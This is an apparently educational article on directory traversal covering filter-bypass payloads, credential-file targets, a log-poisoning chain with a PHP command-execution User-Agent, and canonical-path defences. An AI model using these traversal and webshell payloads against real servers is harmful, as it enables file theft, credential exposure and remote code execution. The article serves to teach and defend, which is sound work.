Understand how attackers use path manipulation to escape the web root and access sensitive server files, and what developers must do to prevent it.
Path Traversal Explained
A directory traversal vulnerability (also called path traversal or dot-dot-slash) allows an attacker to read files on the server that sit outside the intended web root directory. If a web application uses user-supplied input to construct file paths without proper sanitisation, an attacker can manipulate that input to access arbitrary files.
The classic payload is ../ — each ../ moves one directory up in the file system. By chaining these together, an attacker can reach the system root and read files like /etc/passwd, application configuration files, or private keys. In some cases, traversal leads directly to remote code execution when it can be combined with file upload or log poisoning techniques.
How File Systems and Web Roots Work — and Why the Gap Exists
To understand directory traversal, you need a clear mental model of how web servers relate to the file system they run on. A web server is configured with a "document root" — a specific directory that it treats as the top-level location for serving files. Requests are supposed to map only to files within that directory. Everything outside it — system files, application source code, configuration files, private keys — is supposed to be invisible to the web.
The filing cabinet analogy: Imagine a company has thousands of filing cabinets throughout the building: personnel records in HR, financial records in accounting, contracts in legal, and a public-facing brochure rack in the lobby. The receptionist is authorised to hand out anything from the lobby brochure rack when visitors ask. A directory traversal vulnerability is like a receptionist who, when asked for "brochure number 5," blindly follows any path the visitor specifies. Ask for "../../../HR/personnel/employee_salaries" and the receptionist walks to the HR department and retrieves it — because they never verify that the path stays within the lobby. The access boundary exists in policy, but not in implementation.
The technical reason this happens is straightforward: the operating system resolves relative path components when the file is opened, after the application has already built the path. When the server concatenates /var/www/files/ with user input, and that input contains ../../../etc/passwd, the combined path /var/www/files/../../../etc/passwd resolves to /etc/passwd at open time. Unless the application canonicalises the path itself and checks the result, it never learns that the file it opened sits outside the intended directory.
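The resolution step can be reproduced without touching the file system. The following is a minimal Python sketch (the article's own snippets are PHP). `build_path` is a hypothetical stand-in for the server's concatenation, and `posixpath.normpath` only approximates what the OS does: it collapses `..` lexically and ignores symlinks.

```python
import posixpath

BASE_DIR = "/var/www/files/"  # base directory from the example above


def build_path(user_input: str) -> str:
    """Hypothetical stand-in for the server's naive string concatenation."""
    return BASE_DIR + user_input


raw = build_path("../../../etc/passwd")
resolved = posixpath.normpath(raw)  # lexical resolution of the ".." components

print(raw)       # /var/www/files/../../../etc/passwd
print(resolved)  # /etc/passwd
```

The string the application built still begins with /var/www/files/, which is why a check on the unresolved string proves nothing about where the file actually lives.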
What Lives Outside the Web Root — The High-Value Targets
The value of a directory traversal vulnerability depends on what sensitive files are accessible from the server. Understanding the typical Linux server file system layout is essential for knowing what to reach for:
- /etc/passwd: User account list. Not passwords directly (those are in /etc/shadow, which requires root), but reveals usernames, home directories, and shell paths, all useful for targeted attacks.
- /etc/shadow: Hashed passwords for all system users. Readable only by root, so confirming traversal to this file means the web process runs as root, which is itself a critical finding.
- /etc/nginx/nginx.conf, /etc/apache2/apache2.conf: Web server configuration. Reveals virtual host configurations, upstream proxies, authentication mechanisms, and other application endpoints.
- ~/.ssh/id_rsa: SSH private key of the web server user. If readable, grants direct SSH access to the server without a password.
- .env: Environment variables file used by many modern frameworks (Laravel, Django, Node.js). Typically contains database credentials, API keys, secret keys, and cloud provider tokens.
- Application source code (/var/www/app/config/database.php, /app/config.py): Hard-coded credentials, database connection strings, secret keys for signing tokens.
- /proc/self/environ: Process environment variables for the running web process. Often contains secrets passed as environment variables in container environments.
- /var/log/apache2/access.log: Web server access log. Useful for log poisoning attacks that combine traversal with RCE.
In cloud environments, the instance metadata endpoint at http://169.254.169.254/ returns IAM credentials, instance identity, and configuration data. A Server-Side Request Forgery (SSRF) vulnerability, which is conceptually related to path traversal, can reach this endpoint and exfiltrate cloud credentials with account-level impact. Always test for SSRF alongside traversal in cloud environments.
The Mechanics
Consider a web application that serves user-selected files like this:
https://target.com/download?file=report.pdf
The server constructs a path like: /var/www/files/report.pdf and returns the contents. Behind the scenes, the server code likely looks something like:
// Vulnerable: user input concatenated directly into path
$filename = $_GET['file'];
$path = "/var/www/files/" . $filename;
echo file_get_contents($path);
// No validation that $filename stays within /var/www/files/
If an attacker changes the parameter to a traversal sequence, the OS resolves it when the code opens the file:
https://target.com/download?file=../../../../etc/passwd
# Server constructs: /var/www/files/../../../../etc/passwd
# OS normalises to: /etc/passwd
# file_get_contents reads and returns /etc/passwd contents
Web applications often try to block this by filtering ../. Attackers have developed many bypass techniques to evade these naive filters — the root problem is that filtering strings is not the same as enforcing path boundaries.
On Windows, ..\ is the equivalent traversal sequence. Windows also accepts forward slashes in paths, so ../ often works on Windows too. Windows-specific targets include C:\Windows\System32\drivers\etc\hosts, C:\inetpub\wwwroot\web.config, and C:\Windows\win.ini (a classic confirmation target because it is present on virtually every installation).
Payloads in Practice
The most basic payload — works when no filtering is in place. The number of ../ sequences needed depends on how deep the web root is in the file system. Using more than needed is harmless — you can't traverse above the filesystem root. Six is usually sufficient to reach root from any realistic web root depth.
?file=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
...
# The www-data entry shows the account the web server typically runs as
# Any account with /bin/bash shell is a potential lateral movement target
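The claim that surplus ../ sequences are harmless can be checked lexically. This is a small Python sketch, assuming a POSIX-style path and a hypothetical base directory of /var/www/files. `resolve` is an illustrative helper, not part of any application.

```python
import posixpath


def resolve(base: str, depth: int) -> str:
    """Join `depth` copies of ../ plus etc/passwd onto base, then normalise."""
    payload = "../" * depth + "etc/passwd"
    return posixpath.normpath(posixpath.join(base, payload))


for depth in (2, 3, 6, 12):
    print(depth, resolve("/var/www/files", depth))
# 2 /var/etc/passwd
# 3 /etc/passwd
# 6 /etc/passwd
# 12 /etc/passwd
```

Too few sequences land on the wrong directory, while any number at or above the base depth resolves to the same file.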
When a filter matches the literal string ../ against the raw, still-encoded request, URL-encoding the characters bypasses the string match. The web server or framework decodes the URL before passing the parameter to the file-handling code, so that code receives the decoded traversal sequence, but the string filter already checked the encoded version and found no match.
The invisible ink analogy: The filter is looking for visible blue pen markings. Writing the same message in invisible ink passes the filter. The reader (the OS path resolver) still reads the ink. URL encoding is invisible ink for string filters.
?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd
# %2e = . (dot)
# %2f = / (forward slash)
# Decodes to: ../../etc/passwd
# String filter saw: %2e%2e%2f, no match for "../", passes
# OS receives: ../../etc/passwd, traversal executes
# Variant: encode only the slash, leave dots literal
?file=..%2f..%2fetc%2fpasswd
# Variant: encode one dot of each pair
?file=%2e./%2e./etc/passwd
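The mismatch between what the filter inspects and what the file-handling code receives can be sketched in Python. `naive_filter_allows` is a hypothetical filter that looks at the raw, still-encoded value. `urllib.parse.unquote` plays the role of the decoding step that runs afterwards.

```python
from urllib.parse import unquote


def naive_filter_allows(raw_value: str) -> bool:
    """Hypothetical filter: rejects only the literal string '../'."""
    return "../" not in raw_value


payloads = [
    "../../etc/passwd",                # plain: caught by the filter
    "%2e%2e%2f%2e%2e%2fetc%2fpasswd",  # fully encoded
    "..%2f..%2fetc%2fpasswd",          # slashes encoded
    "%2e./%2e./etc/passwd",            # one dot of each pair encoded
]

for raw in payloads:
    # Second column is what the application sees after URL decoding.
    print(naive_filter_allows(raw), unquote(raw))
```

Every encoded variant passes the filter and decodes to the same ../../etc/passwd, which suggests that any check belongs after the final decoding step rather than before it.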
Some WAFs and security filters decode the URL once before checking it, then the application server decodes it a second time. Double encoding exploits this two-decode pipeline: the filter checks the single-decoded version (still encoded), passes it, and the application receives the fully decoded traversal sequence.
# %25 is the URL encoding of % itself
?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd
# WAF decodes once: %2e%2e%2f%2e%2e%2fetc%2fpasswd, no "../" → passes
# App server decodes again: ../../etc/passwd → traversal executes
# Breakdown:
# %25 2e → %2e → .
# %25 2f → %2f → /
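The two-decode pipeline can be traced step by step. In this Python sketch the two `unquote` calls stand in for the WAF's decoding pass and the application server's decoding pass. Both roles are assumptions made for illustration.

```python
from urllib.parse import unquote

payload = "%252e%252e%252f%252e%252e%252fetc%252fpasswd"

after_waf = unquote(payload)    # first decode: what the WAF inspects
after_app = unquote(after_waf)  # second decode: what reaches the file API

print(after_waf)            # %2e%2e%2f%2e%2e%2fetc%2fpasswd
print("../" in after_waf)   # False
print(after_app)            # ../../etc/passwd
```

The value the WAF inspects contains no literal ../, yet one more decoding pass produces the traversal sequence.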
In PHP versions prior to 5.3.4, the null byte (%00) in a string terminated it at the C language level, even if PHP continued processing. This allowed bypassing extension checks: the application validates that the filename ends in .jpg, but the OS opens the file up to the null byte, ignoring everything after it.
?file=../../../../etc/passwd%00.jpg
# PHP extension check: filename ends in ".jpg" → passes validation
# C-level fopen() call: string terminates at \x00 → opens /etc/passwd
# The ".jpg" suffix is never seen by the OS
# Modern PHP is not vulnerable: patched in PHP 5.3.4 (2010)
# Still relevant for: legacy apps, embedded systems, some ICS software
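The disagreement between the high-level string and the C-level string can be modelled in Python. Both helpers are hypothetical: `extension_check` mimics the application's validation, and `c_string_view` simulates how an API expecting a NUL-terminated string would truncate the value. The sketch does not open any file.

```python
from urllib.parse import unquote


def extension_check(filename: str) -> bool:
    """Hypothetical validation: only .jpg files may be served."""
    return filename.endswith(".jpg")


def c_string_view(filename: str) -> str:
    """Simulate a NUL-terminated C string: everything after \\x00 is lost."""
    return filename.split("\x00", 1)[0]


name = unquote("../../../../etc/passwd%00.jpg")

print(extension_check(name))  # True
print(c_string_view(name))    # ../../../../etc/passwd
```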
Some developers implement traversal filters by removing ../ from user input rather than rejecting the request. If the removal is not recursive, an attacker can nest the traversal sequence so that removing the inner ../ reconstructs it from the outer characters.
The word puzzle analogy: If a filter removes the word "bad" from every string, submitting "bbadad" produces "bad" after the first removal pass. The filter ran once and stopped. Nested traversal payloads work the same way.
# Filter removes "../" in a single pass, left to right
?file=....//....//etc/passwd
# Filter removes the inner "../": ....// → ../ after removal
# Result after filtering: ../../etc/passwd → traversal executes
# Variant that nests the sequence differently:
?file=..././..././etc/passwd
# Removing the inner "../" from ..././ also leaves ../
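The reconstruction is easy to verify. In this Python sketch, `strip_once` is a hypothetical single-pass filter and `strip_until_stable` is the repeated version. Neither is taken from a real library.

```python
def strip_once(value: str) -> str:
    """Hypothetical filter: one non-recursive removal pass."""
    return value.replace("../", "")


def strip_until_stable(value: str) -> str:
    """Repeat the removal until no '../' remains."""
    while "../" in value:
        value = value.replace("../", "")
    return value


for payload in ("....//....//etc/passwd", "..././..././etc/passwd"):
    print(strip_once(payload), "|", strip_until_stable(payload))
# ../../etc/passwd | etc/passwd
# ../../etc/passwd | etc/passwd
```

Repeating the removal closes this particular gap, but it remains a blocklist: encoded sequences and absolute paths are untouched by it.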
Some applications filter relative traversal sequences (../) but don't prevent absolute paths. If the user-controlled parameter is passed directly to a file-reading function without any path prefix being prepended, supplying an absolute path bypasses traversal filters entirely — there's nothing to traverse.
# Application code (vulnerable):
$path = filter_traversal($_GET['file']); // removes "../"
readfile($path); // but accepts absolute paths!
# Payload: no traversal needed, absolute path used directly
?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
...
# Also try:
?file=/etc/nginx/nginx.conf → web server config + virtual hosts
?file=/home/ubuntu/.ssh/id_rsa → SSH private key → direct server access
?file=/var/www/html/.env → application secrets
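A short Python sketch shows why a traversal filter has nothing to act on here. `filter_traversal` is a hypothetical reimplementation of the filter named in the snippet above. The `posixpath.join` line illustrates a related Python-specific behaviour, where an absolute second argument discards the base. Other languages' join functions may behave differently.

```python
import posixpath


def filter_traversal(value: str) -> str:
    """Hypothetical filter: strips every '../' but ignores absolute paths."""
    while "../" in value:
        value = value.replace("../", "")
    return value


filtered = filter_traversal("/etc/passwd")
joined = posixpath.join("/var/www/files", filtered)

print(filtered)  # /etc/passwd
print(joined)    # /etc/passwd
```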
Traversal in Production Environments
A healthcare company runs a document management portal that allows authenticated users to download their own records. The download endpoint takes a filename parameter and serves files from /var/www/portal/documents/. A penetration tester notices the parameter in Burp and tests a basic traversal payload.
The /etc/passwd attempt returns content, confirming the vulnerability. Moving up the chain, the tester tries ../../../../var/www/portal/.env — the application's environment variable file. It contains the database hostname, username, and password, the application's JWT secret key (allowing arbitrary token forging), and an AWS S3 access key with access to the company's document storage bucket.
From one traversal vulnerability in a download endpoint, the tester has: database credentials, the ability to forge auth tokens as any user, and cloud storage access containing every patient document in the system. This is a complete data breach from a single file read.
Reading a .env file that contains credentials to a database holding PHI constitutes unauthorised access to protected health information. This is a reportable breach under HIPAA even if no patient records were directly read via the traversal.
An attacker finds directory traversal on a PHP application and can read /var/log/nginx/access.log. The attacker then sends a crafted HTTP request where the User-Agent header contains PHP code: User-Agent: <?php system($_GET['cmd']); ?>. This request is logged verbatim to the access log.
Now the attacker requests the log file through the traversal and appends a command parameter: ?file=../../../../var/log/nginx/access.log&cmd=id. If the vulnerable endpoint loads the file with include or require rather than only reading its bytes, the PHP interpreter executes the code embedded in the log. The server runs id and its output appears in the response. Directory traversal has escalated to Remote Code Execution.
This chain — traversal → log poisoning → RCE — is a well-documented attack pattern. It elevates traversal from a "file disclosure" finding to a "full server compromise" finding and changes the CVSS score from High to Critical.
Traversal vulnerabilities are not only found by testers in custom applications — they appear in widely-used software packages and are assigned CVEs that affect thousands of deployments simultaneously. CVE-2021-41773 (Apache HTTP Server 2.4.49) was a path traversal vulnerability that allowed unauthenticated attackers to read files outside the document root and, in configurations with CGI enabled, execute arbitrary code. It was exploited in the wild within hours of disclosure.
A similar pattern occurred with CVE-2019-18935 (Telerik UI for ASP.NET), CVE-2018-1000600 (Jenkins), and multiple Cisco, Fortinet, and Pulse Secure VPN products. Each affected organisations that were running unpatched software. The lesson for defenders: directory traversal is not only a custom code problem. Dependency and network appliance patch management is equally important.
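Whether the target is custom code or packaged software, traversal attempts tend to leave recognisable strings in request logs. The following Python sketch shows one way a log check might flag them. The pattern list, the `looks_like_traversal` name, and the three-round decoding limit are illustrative assumptions, not rules from any particular WAF or SIEM product.

```python
import re
from urllib.parse import unquote

# Assumed signature set: ../, ..\ and a well-known target file.
SIGNATURE = re.compile(r"\.\./|\.\.\\|/etc/passwd", re.IGNORECASE)


def looks_like_traversal(request_target: str) -> bool:
    """Decode up to three times, then search for traversal signatures."""
    decoded = request_target
    for _ in range(3):  # bounded, so nested encodings cannot loop forever
        once_more = unquote(decoded)
        if once_more == decoded:
            break
        decoded = once_more
    return bool(SIGNATURE.search(decoded))


print(looks_like_traversal("/download?file=report.pdf"))             # False
print(looks_like_traversal("/download?file=..%2f..%2fetc%2fpasswd")) # True
print(looks_like_traversal("/download?file=%252e%252e%252fsecret"))  # True
```

A check like this supports monitoring and alerting. It does not replace path validation in the application itself.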
Strings such as ../, %2e%2e, and /etc/passwd in request parameters are strong attack signatures. Web Application Firewalls and SIEM rules for these strings should be standard in any security monitoring setup.
What Path Traversal Means for Infrastructure Security
- A single traversal vulnerability is a master key. Every file readable by the web server process is exposed: configuration files, credentials, source code, private keys, log files. The scope is not limited to "some user data" — it's the entire server file system accessible to the process.
- Traversal findings often cascade. Credentials found in .env files unlock databases, cloud accounts, and third-party APIs. SSH keys found in home directories unlock direct shell access. JWT secrets found in config files unlock authentication bypasses. A single traversal exploit often yields multiple critical follow-on findings.
- Principle of least privilege limits blast radius. The web server process should run as a user with the minimum permissions needed: no access to SSH keys, no access to other users' home directories, no read access to files outside the web root. If the web process can't read /etc/shadow, traversal to it fails regardless of whether the vulnerability exists. Process isolation and file permissions are a critical compensating control.
- The correct fix is allowlist-based path validation. Filtering ../ is a blocklist approach and will always be bypassable with new encodings and techniques. The correct defence: resolve the full canonical path first using realpath() or equivalent, then verify the resolved path starts with the intended base directory. If it doesn't match, reject the request. This approach is encoding-agnostic and filter-bypass-proof.
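The canonicalise-then-compare approach described above can be sketched in Python as follows. `resolve_inside` is a hypothetical helper name, the demo directory is a throwaway temp folder, and the code assumes a POSIX-style file system and an input that has already been fully URL-decoded.

```python
import os
import tempfile


def resolve_inside(base_dir: str, user_input: str) -> str:
    """Return the canonical path, or raise if it escapes base_dir."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks before any comparison.
    candidate = os.path.realpath(os.path.join(base, user_input))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError("path escapes base directory")
    return candidate


# Demo with a temporary directory standing in for /var/www/files.
demo_base = tempfile.mkdtemp()
with open(os.path.join(demo_base, "report.pdf"), "w") as handle:
    handle.write("demo")

print(resolve_inside(demo_base, "report.pdf"))
for attempt in ("../../../../etc/passwd", "/etc/passwd"):
    try:
        resolve_inside(demo_base, attempt)
    except PermissionError:
        print("rejected:", attempt)
```

Comparing with `os.path.commonpath` rather than a plain string prefix avoids accepting a sibling directory such as /var/www/files-private when the base is /var/www/files.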
$base = '/var/www/files/';
$real = realpath($base . $input);
// realpath() returns false for paths that do not exist
if ($real === false || strpos($real, $base) !== 0) {
    die('Access denied');
}
This resolves all traversal sequences before checking the path, making encoding bypasses irrelevant.
What You Need to Know
- The operating system resolves ../ when the file is opened, after any string filter has already run. Secure code must normalise (canonicalise) paths first with realpath(), then validate, rather than filtering strings before normalisation.
- High-value targets include /etc/passwd, .env, SSH keys, web server configs, application source, and /proc/self/environ. Each can cascade into further compromise.
- Use ..\ on Windows servers. Target C:\Windows\win.ini for confirmation and web.config for credentials.